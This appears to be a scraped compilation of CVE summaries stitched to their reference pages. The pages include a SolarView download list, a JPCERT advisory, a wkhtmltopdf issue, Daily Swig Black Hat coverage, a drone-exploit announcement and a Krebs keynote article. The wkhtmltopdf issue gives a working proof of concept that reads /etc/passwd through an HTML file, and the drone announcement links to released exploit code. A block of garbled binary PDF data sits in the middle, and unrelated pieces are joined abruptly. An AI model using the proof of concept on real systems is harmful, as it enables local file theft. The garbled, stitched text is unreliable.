The image file management page of SolarView Compact SV-CPT-MC310 Ver.7.23 and earlier, and SV-CPT-MC310F Ver.7.23 and earlier contains an insufficient verification vulnerability when uploading files. If this vulnerability is exploited, arbitrary PHP code may be executed if a remote authenticated attacker uploads a specially crafted PHP file.

**SV-CPT-MC310****マニュアル**

   

データ

容量

更新日

掲載日

解説書 | SV-CPT-MC310 Series \[日本語\]

1197 KB

2021.10.11

2017.01.12

SolarView Compact / Airソフトウェアマニュアル(PDF版) Ver.6.00以降

9801 KB

2022.05.25

2019.01.10

SolarView Compact ソフトウェアマニュアル(PDF版) Ver.4.00以降

7323 KB

2020.04.29

2016.11.18

SolarView Compact ソフトウェアマニュアル(PDF版) Ver.3.20以前

5693 KB

2018.09.25

2015.04.03

**テクニカルガイド**

   

データ

容量

更新日

掲載日

かんたんセットアップガイド | SV-CPT-MC310 \[日本語\]

4258 KB

2022.02.15

2015.07.07

SolarView シリーズ パソコン設定方法 Windows 11 (PDF版)

1427 KB

2022.02.15

2022.02.15

SolarView シリーズ パソコン設定方法 Windows 10 (PDF版)

989 KB

2022.02.15

2016.02.24

SolarView シリーズ パソコン設定方法 Windows 8 (PDF版)

730 KB

2014.11.07

2014.11.07

SolarView シリーズ パソコン設定方法 Windows 7 (PDF版)

1824 KB

2014.11.07

2014.11.07

SolarViewシリーズ ファームウェア アップデート手順書(PDF版)

1261 KB

2021.02.16

2018.08.31

**その他ドキュメント**

   

データ

容量

更新日

掲載日

パワコン対応リスト | SolarView Compact/Air

408 KB

2022.08.08

2016.11.18

動作検証済USBメモリリスト | SolarView Compact/Air

297 KB

2021.12.24

2021.12.24

SolarView オプションキット(PDF版)

502 KB

2016.12.16

2012.10.02

SolarView シリーズ　ケーブル製作時・配線時の注意(PDF版)

224 KB

2014.12.24

2014.12.24

**デバイスドライバ**

   

データ

容量

更新日

掲載日

SolarView Compact/Battery　メール暗号化対応パッチ

793 KB

2020.03.06

2019.09.10

**開発支援ツール**

   

データ

容量

更新日

掲載日

**追加サンプルプログラム**

   

データ

容量

更新日

掲載日

**アプリケーション**

   

データ

容量

更新日

掲載日

**ファームウェア**

   

データ

容量

更新日

掲載日

SolarView Compact ファームウェア アップデータ Ver.7.24

724 KB

2022.07.21

2022.03.23

SolarView Compact ファームウェア アップデータ Ver.7.00

2082 KB

2021.11.10

2021.02.16

SolarView Compact ファームウェア アップデータ Ver.6.00

1868 KB

2019.01.10

2019.01.10

SolarView Compact ファームウェア アップデータ Ver.5.00

1748 KB

2017.07.24

2017.07.24

SolarView Compact ファームウェア アップデータ Ver.4.00

612 KB

2016.10.25

2016.10.25

SolarView Compact ファームウェア アップデータ Ver.3.00

8384 KB

2015.07.31

2015.07.31

**ユーティリティ**

   

データ

容量

更新日

掲載日

**CAD**

   

データ

容量

更新日

掲載日

SV-CPT-MC310 CADデータ

49 KB

2012.03.16

2012.03.16

**カタログ**

   

データ

容量

更新日

掲載日

リーフレット | SolarView Compact SV-CPT-MC310 \[日本語\]

914 KB

2022.06.23

2020.09.15

製品紹介資料 | SolarView Compact \[日本語\]

4996 KB

2022.08.09

2019.02.14

SolarView Compact 接続イメージ図

1912 KB

2019.02.14

2019.02.14

CVE-2022-35239: ダウンロード | コンテック

An unquoted search path vulnerability exists in 'JustSystems JUST Online Update for J-License' bundled with multiple products for corporate users as in Ichitaro through Pro5 and others. Since the affected product starts another program with an unquoted file path, a malicious file may be executed with the privilege of the Windows service if it is placed in a certain path. Affected products are bundled with the following product series: Office and Office Integrated Software, ATOK, Hanako, JUST PDF, Shuriken, Homepage Builder, JUST School, JUST Smile Class, JUST Smile, JUST Frontier, JUST Jump, and Tri-De DetaProtect.

Published:2022/07/28  Last Updated:2022/07/28

**Overview**

"JustSystems JUST Online Update for J-License" bundled with multiple JustSystems products for corporate users starts another program with an unquoted file path.

**Products Affected**

"JustSystems JUST Online Update for J-License" (for corporate users) is affected.  
For more information, refer to the information provided by the developer.

**Description**

"JustSystems JUST Online Update for J-License" is bundled with multiple products for corporate users provided by JustSystems Corporation, as in Ichitaro through Pro5 and others, and it is registered as a Windows service.  
"JustSystems JUST Online Update for J-License" starts another program with an unquoted file path (CWE-428).

**Impact**

A malicious file may be executed with the privilege of the Windows service.

**Solution**

**Update the software**  
Update the software to the latest version according to the information provided by the developer.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

CVSS v3 CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Attack Vector(AV)

Physical (P)

Local (L)

Adjacent (A)

Network (N)

Attack Complexity(AC)

High (H)

Low (L)

Privileges Required(PR)

High (H)

Low (L)

None (N)

User Interaction(UI)

Required (R)

None (N)

Scope(S)

Unchanged (U)

Changed (C)

Confidentiality Impact(C)

None (N)

Low (L)

High (H)

Integrity Impact(I)

None (N)

Low (L)

High (H)

Availability Impact(A)

None (N)

Low (L)

High (H)

CVSS v2 AV:L/AC:L/Au:S/C:C/I:C/A:C

Access Vector(AV)

Local (L)

Adjacent Network (A)

Network (N)

Access Complexity(AC)

High (H)

Medium (M)

Low (L)

Authentication(Au)

Multiple (M)

Single (S)

None (N)

Confidentiality Impact(C)

None (N)

Partial (P)

Complete (C)

Integrity Impact(I)

None (N)

Partial (P)

Complete (C)

Availability Impact(A)

None (N)

Partial (P)

Complete (C)

**Comment**

The analysis assumes that Windows filesystem ACLs are configured in a certain way where a non-administrative user can abuse the issue.

**Credit**

Hiroki MATSUKUMA of Cyber Defense Institute, Inc. reported this vulnerability to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

**Other Information**

CVE-2022-36344: "JustSystems JUST Online Update for J-License" starts a program with an unquoted file path

Directory Traversal vulnerability ZDBQAREFSUBDIR parameter in /zropusermgmt API in Zoho ManageEngine Analytics Plus before 4350 allows remote attackers to run arbitrary code.

CVE-2020-21642: ManageEngine Analytics Plus | Release Notes

Directory traversal vulnerability in wkhtmltopdf through 0.12.5 allows remote attackers to read local files and disclose sensitive information via a crafted html file running with the default configurations.

**wkhtmltopdf version(s) affected**:  
all version ( <=0.12.5 )

**OS information**  
All supported OS

**Description**  
Because the same-origin policy is not strict enough, the html files under the file domain can read any files.

**How to reproduce**

Create an HTML file named 111.html  
The file contents are as follows.

    <!DOCTYPE html>
    <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <body>
    
    <script>
    x=new XMLHttpRequest;
    x.onload=function(){
    document.write(this.responseText)
    };
    x.open("GET","file:///etc/passwd");
    x.send();
    </script>
    
    </body></html>
    

Convert HTML to PDF:

    wkhtmltopdf  /tmp/111.html  /tmp/result.pdf
    

**Expected behavior**  
View the file named result.pdf contents, you will see the contents of the file /etc/passwd!

**Possible Solution**  
Make a strict same-origin policy or set a security option, to prevent HTML documents under the file domain from reading any files.

CVE-2020-21365: The same origin policy allows local files to be read by default · Issue #4536 · wkhtmltopdf/wkhtmltopdf

Heap buffer overflow in PDF in Google Chrome prior to 104.0.5112.79 allowed a remote attacker who convinced a user to engage in specific user interactions to potentially exploit heap corruption via a crafted PDF file.

**Chrome Releases**

Release updates from the Chrome team

CVE-2022-2624: Stable Channel Update for Desktop

CI/CD support is next for WAF security tool

CI/CD support is next for WAF security tool

Popular open source hacking tool GoTestWAF has become the first utility of its type to evaluate API security platforms, Black Hat USA attendees have learned.

Launched in April 2020, the security testing tool simulates OWASP and API exploits to test the detection capabilities of web application firewalls (WAFs), NGWAFs, RASPs, WAAPs, and, now, API security tools.

It supports REST, GraphQL, gRPC, WebSockets, SOAP, XMLRPC, and legacy APIs.

Read more about the latest security research and Arsenal talks at Black Hat USA 2022

OpenAPI-based scanning has been introduced “so you can scan exactly what is defined in your API spec during the attack simulation”, Brandon Shope, principal security engineer at Wallarm, told attendees at his Arsenal session yesterday (August 11).

The GoTestWAF GitHub repo explains how OpenAPI (formerly Swagger) file scans work, which OpenAPI features are supported, and how “instead of constructing requests that are simple in structure and send them to the URL specified at startup, GoTestWAF creates valid requests based on the application’s API description in the OpenAPI 3.0 format”.

**More attack types incoming**

Other new features currently in development, meanwhile, are a daemon for CI/CD pipelines with API and server mode, and support for additional attack types, including Java, Python, and .NET serialization attacks, said Shope.

GoTestWAF generates malicious requests using encoded payloads placed in different parts of HTTP requests. The results indicate the number and percentage of path traversal, shell injection, cross-site scripting (XSS), and various other attack types blocked by the security tool.

RELATED Black Hat USA: Log4j de-obfuscator Ox4Shell ‘dramatically’ reduces analysis time

GoTestWAF compares scan results to ModSec as a baseline, Shope said, and presents them in a “readable, nicely formatted PDF”. Wallarm CEO Ivan Novikov described this as a “really important” feature ahead of Shope’s presentation.

Testing for false negatives and positives is seen by Wallarm as invaluable given WAFs’ notoriety for generating false positives, which the API security firm says often occupies users at the expense of testing false negative rates.

**Community payloads**

Multiple ‘nested’ encoding support, codeless checks with YAML files, dockerization, and community payloads were also highlighted at the Las Vegas event.

Community support is a significant factor in the tool’s appeal, Novikov told The Daily Swig, citing community test cases documented by researchers from security intelligence search engine Vulners team “and then supported by others”.

GoTestWAF is already “used about 100 times a week” and asked about during sales and marketing calls by “about five enterprise companies a week”, according to Novikov.

Wallarm launched a free Online WAF tester for the tool last month.

RECOMMENDED Black Hat USA: Deliberately vulnerable AWS, Azure cloud infrastructure is a pen tester’s playground

GoTestWAF adds API attack testing via OpenAPI support

Open source recon tool automates some of the more time-consuming pen testing tasks

James Walker 11 August 2022 at 15:35 UTC

Open source recon tool automates some of the more time-consuming pen testing tasks

Black Hat USA attendees were given a firsthand look at the new and improved ReNgine, which includes several new features for penetration testers and red teamers.

ReNgine is a highly customizable open source reconnaissance framework that works with other utilities to scan domains, list endpoints, and search directories.

Security professionals can use the tool to create a pipeline that pulls together more complex queries from scan engines and present the results in a single window.

**BACKGROUND** ReNgine: Open source recon tool automates intel-gathering process for pen testers

With 4,500 stars on GitHub, ReNgine has continued to grow in popularity over recent months – thanks in no small part to the steady addition of new features to assist pen testers with their daily tasks.

The tool’s developer is Yogesh Ojha, a security pro working on web and mobile applications. His goal is to automate some of the more time-consuming research operations, as well as bringing open source hacking tools together.

“There are several open source recon tools in the market,” Ojha told _The Daily Swig_. “What sets ReNgine apart from the other tools is the easy-to-use web interface, ability to customize the scan engines according to the targets, the UI/UX, and easy integration on VPS with minimal setup.”

**New features**

Launched in time for Black Hat USA, and showcased during the Arsenal sessions on Wednesday (August 10), ReNgine version 1.3.0 includes several new features.

First up is a unique subscan feature that allows users to scan any target subdomains further.

“Once subdomain scanning is done, you can choose one or multiple subdomains and send for further port scans, vulnerability scans, or any scans available,” Ojha explained.

“The added benefit of the subscan feature is that, for larger targets like google.com you need not wait for the entire scan to complete. One can simply perform a subdomain scan and perform further sub scans on those subdomains.”

Read about more of the latest hacking tools

ReNgine 1.3.0 also comes bundled with a highly customizable PDF report feature, which allows users to choose the type, look, and feel of the report.

Meanwhile, a new toolbox feature for ReNgine allows pen testers to integrate tools like WHOIS lookup and WAF Detector without the need to add a URL/domain as targets. More toolboxes are on the way.

Among the various UI/UX improvements in ReNgine 1.1, column filtering “was one of the most asked for features”, Ojha said.

“Column filtering allows users to focus on what’s important in the subdomains, endpoints, and vulnerability result table section. This allows users to hide and unhide certain columns.”

Ojha added: “In a nutshell, the newer upgrade of ReNgine makes it more than just a recon tool. The latest update aims to fix the gap in the traditional recon tools and probably a much better alternative for some of the commercial recon and vulnerability assessment tools.

**YOU MIGHT ALSO LIKE** Latest web hacking tools – Q3 2022

ReNgine upgrade: New subscan feature, PDF reports, expanded toolbox showcased at Black Hat USA

Improper Input Validation vulnerability in the project upload mechanism in B&R Automation Studio version >=4.0 may allow an unauthenticated network attacker to execute code.

%PDF-1.7 %���� 1 0 obj <>/Metadata 165 0 R/ViewerPreferences 166 0 R>> endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/XObject<>/ProcSet\[/PDF/Text/ImageB/ImageC/ImageI\] >>/Annots\[ 9 0 R\] /MediaBox\[ 0 0 595.32 841.92\] /Contents 4 0 R/Group<>/Tabs/S/StructParents 0>> endobj 4 0 obj <> stream x��\[\[o��~7��0@��\*��w����d��pm�}�䁒���"������˞9��a,��m�8o�:���f��(��dR�7oF��2�,ҩ�<��׿�����:�/��\\���v;.�ԏi2M��o���+����-m�'�B%l�ǾtyJƎ(���Ud�g�w�g��J�2����o��~ ��aHGܭ�nC1���Ŝ~Eկ��>\[b�����x�?��ć��ĨŌ˼,�U�%��zK�K�PFd�\_�}����4��\*���/�ضJ1����%.C��n0���}O�L)xA\`�Lt-̵m�-nx�d7��{Ɏ-c�,����'�-QJ��$ޡ��p�a��S��Ww

CVE-2021-22289

The Gumstix Overo SBC on the VSKS board through 2022-08-09, as used on the Orlan-10 and other platforms, allows unrestricted remapping of the NOR flash memory containing the bitstream for the FPGA.

**Background**

Subreption’s research and development team, for the past few months, has been dedicating manpower and resources to investigate and analyze military and paramilitary drone platforms operating in Asia and Europe. Our background is primarily vulnerability research and reverse engineering, enabling us to understand these platforms for both offensive and defensive purposes, including but not limited to detection, forensics data acquisition and active countermeasures.

**Demystifying the Orlan: a technical report**

As part of the announcement, we are releasing our first public report from the program, related to the Orlan (primarily Orlan-10) platforms in use by the armed forces of the Russian Federation. The Orlan-10 has been a center piece in the Russo-Ukrainian war of 2022, with sensational coverage from the press. Very little factual or in-depth information has been published, and most of the journalism involved has been heavily connected to counter-drone (CUAS) commercial vendors making claims without third-party verification.

We are taking the opportunity to release the first documented exploit against a military drone platform (in this case, one targeting the FPGA used in the Orlan-10 communications system), while providing in-depth analysis of the hardware and software internals, detailing the reverse engineering efforts involved. Hopefully, this invites and motivates others (including academia and industry peers) to publish factual, technically verifiable research instead of “marketing in disguise”. While the topic is sensitive, we have carefully assessed the information published, withholding details that might not be ready for public disclosure yet.

For the better and the worse, information related to the Orlan platform has been circulating in a mostly uncontrolled and unsupervised fashion with third-parties for the last few months.

In many cases, this was directly connected with for-profit organizations attempting to develop products for the Ukrainian market, and more often than not, security practices left much to be desired (admittedly, many of the organizations involved with CUAS products are not qualified as software security vendors, and typically radiofrequency engineers and hardware development vendors do not have a spotless security posture, most of them being wildly unaware of the state of the art in offensive security).

Contrary to propaganda, the Orlan platform, contains sophisticated original research and development, especially in its communications system. We are dedicated to providing truthful, unbiased information to our customers and the general public, as part of our principles and values, beyond any commercial, personal or political agenda.

**The report can be downloaded here:**

*   https://subreption.com/downloads/reports/demystifying-the-orlan-10\_opt.pdf (optimized PDF)
*   https://github.com/subreption/birdwatch-report-1-repo (including source code and additional files, mirror/fork freely)

**What does the exploit do?**

*   The exploit abuses a vulnerability in the FPGA application and Linux kernel driver, to remap access to the NOR flash memory containing the actual “application” or bitstream the FPGA boots from.
*   This allows rendering the drone inoperable and/or trojanizing the FPGA software.
*   Remote (over the network) vectors exist to abuse the vulnerability, allowing a full remote exploit chain to exist when paired with a traffic injection attack.

**Take-aways**

*   The technical report is the **first of its kind**, with no technical resources of reverse engineering or in-depth analysis of the Orlan-10. Every news piece to date merely focused on unverified claims or marketing attempts for products sold by CUAS vendors.
*   This is the **first publicly documented military drone vulnerability published or disclosed openly**.
*   The code to the FPGA NOR remapping exploit has been publicly released at https://github.com/subreption/birdwatch-report-1-repo/tree/master/src
*   The report and tools developed are the result of the BIRDWATCH program, a months-long initiative to collaborate with groups interested in independent, unbiased investigation of (mostly military) drone security.

**The BIRDWATCH program**

Subreption recently opened up the BIRDWATCH program to be more accessible and transparent, focusing on a non-commercial approach. Our intentions with the program are fairly straightforward: to provide reverse engineering and accurate analysis of drone platforms used for defensive and offensive purposes. We have successfully collaborated with multiple groups internationally, including groups based out of Ukraine.

The nature and motivations of the program are not political. We strive to remain impartial, focused on the technical details and unbiased analysis. We will consider cooperation with any organizations and individuals, with no discrimination, so as long as it is permitted by law, including any applicable restrictions due to sanctions.

**How to participate**

At the moment, there are two distinct venues for collaboration, for commercial and non-commercial engagements.

*   **If you are a non-government not-for-profit organization or institution**, not presently taking bribes or commissions in any shape or form from commercial vendors, we can offer pro bono services including research and forensics data analysis.
    *   This service requires transparency and accountability, as we will independently take the appropriate measures to **identify and validate partners and their affiliations**.
    *   We do not offer pro bono services to individuals, business entities or governments, with no exceptions.
    *   Any form of profit (direct or indirect) is an instant disqualifier from our “pro bono” work. This includes, but is not limited to, employment or income sources directly related or benefiting from activities related to cooperation with the program.
    *   Organizations engaging in procurement or contracting of foreign vendors and their products are typically excluded as well.
*   **If you are a for profit organization** (including but not limited to charities receiving financial aid and at the same time purchasing or engaging in the trade of high value products and services), we can offer competitive pricing on our consulting and research and development services.

While we might occasionally make exceptions, we do not engage with pseudonymous individuals or organizations without adequate accountability. We are also not interested in the illegal or illegitimate trade of hardware or captured systems. In order to protect both the work and the interests of all parties involved, Subreption will require both a Mutual Non-disclosure Agreement and a Non-compete Agreement signed by all the recipients of the information and hardware exchanged.

**Sending applications**

If you meet the criteria, feel absolutely **welcome** to contact us at including as much detail as possible in your application. **We will consider all applicants carefully on a case-by-case basis.**

**Conflicts of interest**

Subreption is not currently involved in the sale or procurement of counter drone-related products for Ukraine. All research related to military drone platforms until August 2022 has been provided free of charge, as part of the BIRDWATCH program.

Our staff has no assets or financial instruments associated in any way to any consumer or industrial drone (or counter-drone) vendor.

Subreption is providing pro bono consulting and research to multiple institutions in Europe and Asia, as well as volunteer organizations, in the context of information security (defensive and offensive).

**References**

*   US Army OE Data Integration Network (ODIN) resources on Orlan systems
*   Orlan-10 (Wikipedia)
*   Russia’s Deadly Artillery Drones Have A Strange Secret (Forbes)

**Updates**

Any updates and amendments to this press release will be listed in this section.

Press and media can reach us at regarding this announcement or any other inquiries.

Feel welcome to use PGP if you have sensitive information or special confidentiality needs.

    -----BEGIN PGP PUBLIC KEY BLOCK-----
    
    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
    =D+RF
    -----END PGP PUBLIC KEY BLOCK-----

CVE-2022-38161: BIRDWATCH program: Ghost in the Orlan: demystifying a military drone platform

Attack on Taiwan seemingly a case of ‘when’ not ‘if’ Chris Krebs, the former director of the US Cybersecurity and Infrastructure Security Agency (CISA), says the infosec industry is “bearish in the sh

Attack on Taiwan seemingly a case of ‘when’ not ‘if’

Chris Krebs, the former director of the US Cybersecurity and Infrastructure Security Agency (CISA), says the infosec industry is “bearish in the short term, bullish in the long term” on the prospects for US national cyber-resilience.

The ex-director, now a founding partner of Krebs Stamos Group, told an audience at Black Hat USA that a likely Chinese attack on Taiwan meant organizations had to act now on making their digital infrastructure and supply chain resilient during the opening day of the annual conference, this year held both physically and virtually.

Krebs addressed attendees on the conference’s 25th edition as the opening keynote speaker.

**Taiwan in dire straits**

Earlier, Black Hat founder Jeff Moss introduced the talk by reflecting on how Russia’s invasion of Ukraine had awakened the infosec community to its power to help the government defend human rights and tackle “mis, dis, and mal information”.

Krebs, who served under President Donald Trump, said organizations, too, had an obligation to have principles and red lines in place before further geopolitical conflagrations erupted – for both ethical and self-interested motives.

Catch up with the latest cyber warfare news

US officials had indeed told him that they were "pretty confident" that the Taiwan tensions are "going to come to a head" at some point, as Krebs warned that organizations should “manage risk yesterday”, game out how it might affect their supply chain and IT operations, and physically segment their networks in Taiwan starting “now”.

**Workforce shortage**

Krebs noted that he found it “confounding” that the cybersecurity workforce continues to face workforce shortages. After all, the cybersecurity career was fun, lucrative, durable, fascinating, and – given that national security was at stake – meaningful, he said.

One key to addressing growing cyber-threats is providing more opportunities for young people to experience coding and to instil “critical thinking skills”, suggested Krebs.

Chris Krebs at Black Hat USA: US Department of Defense has “incredible purchasing power – they must use it”

On a more positive note, he took hope from an increasingly tech-native workforce.

Another reason for cheer was found in the boardroom, with “a CEO that sees cyber risk as business risk is rare, but that is changing post-Colonial \[Pipeline ransomware attack\].”

**Unthinkable complexity**

The workforce gap is fuelled by, as Krebs described (PDF) it to a US congressional committee, society’s “pathological need to connect everything to the internet”, resulting in a ballooning attack surface.

The targets are increasingly complex too, to the point where even experts struggle to understand what Neuromancer author William Gibson prophetically called “the unthinkable complexity” of cyberspace.

Citizens, infosec professionals, and organizations alike must reckon with the fact that every country in the world – not just China, Russia, Iran, and North Korea – is seeing the internet as the “fifth domain”, through which they can surveil, destroy, and disrupt, observed Krebs.

Meanwhile, ransomware groups are capable of exploits that were sole preserve of nation states only few years ago, and that following NotPetya, the 2015 Ukraine power grid attack, and the SolarWInds hack, more novel, innovative attacks would inevitably arise, he warned. “We’ve fetishized the APT threat while cybercriminals have eaten our lunch,” said Krebs.

Krebs set out his prescriptions for how the cybersecurity industry and government should get ahead of the coming threats. Government, for instance, should leverage its role as consumer, enforcer, defender, and enabler. As a consumer, to take one example, he said: “The US Department of Defence the largest customer of big tech firms” with “incredible purchasing power – they have to use it.”

As for his former employer, CISA, he insisted that it is, and must continue to be, apolitical.

RECOMMENDED The best Black Hat and DEF CON talks of all time

Tag

#pdf